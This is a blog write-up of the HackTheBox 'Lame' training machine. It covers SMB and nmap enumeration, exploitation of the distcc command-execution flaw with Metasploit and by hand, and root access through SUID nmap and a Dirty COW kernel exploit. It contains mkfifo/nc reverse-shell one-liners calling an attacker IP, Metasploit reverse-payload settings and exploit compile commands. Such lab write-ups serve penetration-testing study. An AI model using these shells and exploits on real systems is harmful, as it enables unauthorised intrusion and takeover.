Home HackTheBox - Lame
Post
Cancel
Preview Image

HackTheBox - Lame

By yufongg
Posted 2022-08-17 Updated 2022-09-19 3 min read

Overview

HackTheBox Lame marks the beginning of me trying to complete TJNull’s OSCP List for HackTheBox.

This machine begins w/ nmap detecting a service exploit for distcc v1 that allows command execution, allowing us to obtain daemon user/shell.

There are 2 privilege escalation techniques used in this machine, a SUID GTFOBin and a kernel exploit.

ColumnDetails
Box NameLame
IP10.10.10.3
Points-
DifficultyEasy
Creatorch4p
Release Date14-March-2018

Recon

TCP/139,445 (SMB)

Enum4linux

  • Enumerated some users
    1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38

      ┌──(root💀kali)-[~/htb/lame]
  └─# cat enum4linux_users | grep username
    username: root
    username: daemon
    username: bin
    username: sys
    username: sync
    username: games
    username: man
    username: lp
    username: mail
    username: news
    username: uucp
    username: proxy
    username: www-data
    username: backup
    username: list
    username: irc
    username: gnats
    username: libuuid
    username: dhcp
    username: syslog
    username: klog
    username: sshd
    username: bind
    username: postfix
    username: ftp
    username: postgres
    username: mysql
    username: tomcat55
    username: distccd
    username: telnetd
    username: proftpd
    username: msfadmin
    username: user
    username: service
    username: nobody

SMBMap

  • Found a fileshare /tmp
    1
2
3
4
5
6
7
8

      [+]IP:10.10.10.3:445	Name:10.10.10.3
  Disk	Permissions	Comment
  ----	-----------	-------
  print$	NOACCESS	PrinterDrivers
  tmp	    READ,WRITE	ohnoes!
  opt	    NOACCESS	
  IPC$	NOACCESS	IPCService(lameserver(Samba3.0.20-Debian))
  ADMIN$	NOACCESS	IPCService(lameserver(Samba3.0.20-Debian))
    • /tmp - RW

TCP/3632

NMAP 

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24

PORT     STATE SERVICE REASON         VERSION
3632/tcp open  distccd syn-ack ttl 63 distccd v1 ((GNU) 4.2.4 (Ubuntu 4.2.4-1ubuntu4))
| distcc-cve2004-2687: 
|   VULNERABLE:
|   distcc Daemon Command Execution
|     State: VULNERABLE (Exploitable)
|     IDs:  CVE:CVE-2004-2687
|     Risk factor: High  CVSSv2: 9.3 (HIGH) (AV:N/AC:M/Au:N/C:C/I:C/A:C)
|       Allows executing of arbitrary commands on systems running distccd 3.1 and
|       earlier. The vulnerability is the consequence of weak service configuration.
|       
|     Disclosure date: 2002-02-01
|     Extra information:
|       
|     uid=1(daemon) gid=1(daemon) groups=1(daemon)
|   
|     References:
|       https://distcc.github.io/security.html
|       https://nvd.nist.gov/vuln/detail/CVE-2004-2687
|_      https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2004-2687

Read data files from: /usr/bin/../share/nmap
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Tue Aug 16 22:28:52 2022 -- 1 IP address (1 host up) scanned in 18.03 seconds
  • Vulnerable to RCE exploit

Initial Foothold

TCP/3632 - distcc RCE exploit w/ Metasploit

  1. Launch msfconsole
  2. Search for distcc and use unix/misc/distcc_exec
    1
2

     msf6 use unix/misc/distcc_exec
 msf6 exploit(unix/misc/distcc_exec) > options
  3. Set OPTIONS
    1. Set RHOSTS
      1
2

       msf6 exploit(unix/misc/distcc_exec) > set RHOSTS $ip
 RHOSTS => $ip
    2. Set Payload
      1

       msf6 exploit(unix/misc/distcc_exec) > set payload cmd/unix/reverse
    3. Set LHOST
      1
2

       msf6 exploit(unix/misc/distcc_exec) > set LHOST 10.10.14.2
 LHOST => 10.10.14.2
  4. Exploit

TCP/3632 - distcc RCE exploit w/o Metasploit

  1. Google distcc exploit -lame
    • To avoid spoilers
  2. Found a github exploit
  3. Exploit
  4. This shell is limited, stuck in /tmp directory, invoke another reverse shell to obtain a more stable shell
    1
2
3
4
5
6
7
8
9
10
11
12
13

    rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.10.14.17 4242 >/tmp/f
	
 ┌──(root💀kali)-[~/htb/lame]
 └─# nc -nvlp 4242
 Ncat: Version 7.92 ( https://nmap.org/ncat )
 Ncat: Listening on :::4242
 Ncat: Listening on 0.0.0.0:4242
 Ncat: Connection from 10.10.10.3.
 Ncat: Connection from 10.10.10.3:48838.
 sh: no job control in this shell
 sh-3.2$ id
 uid=1(daemon) gid=1(daemon) groups=1(daemon)
  5. User Flag
    1
2
3
4
5
6

     daemon@lame:/home$ find . 2>/dev/null | grep user
 ./makis/user.txt
	
 daemon@lame:/home$ cat ./makis/user.txt
 0bfd0837e923142a01b6ece77f3d6b97

Privilege Escalation

Root - Via SUID GTFOBin

  1. Ran linpeas, found something interesting
  2. Exploit
    1
2
3

     daemon@lame:/tmp$ /usr/bin/nmap --interactive
 nmap> !rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.10.14.17 4444 >/tmp/f

  3. Root obtained

Root - Via Kernel Exploit

  1. Check kernel version
    1
2

     daemon@lame:/tmp$ uname -a
 Linux lame 2.6.24-16-server #1 SMP Thu Apr 10 13:58:00 UTC 2008 i686 GNU/Linux
  2. Transfer exploit to target
  3. Exploit
    1
2

     gcc -pthread dirty.c -o dirty -lcrypt
 ./dirty

  4. SSH w/ firefart:password
HackTheBox, HackTheBox - Linux
linux-priv-esc/kernel-exploit
This post is licensed under CC BY 4.0 by the author.
Recent Update
Contents

Pi-Hole Setup & Results

HackTheBox - BrainFuck

Comments powered by Disqus.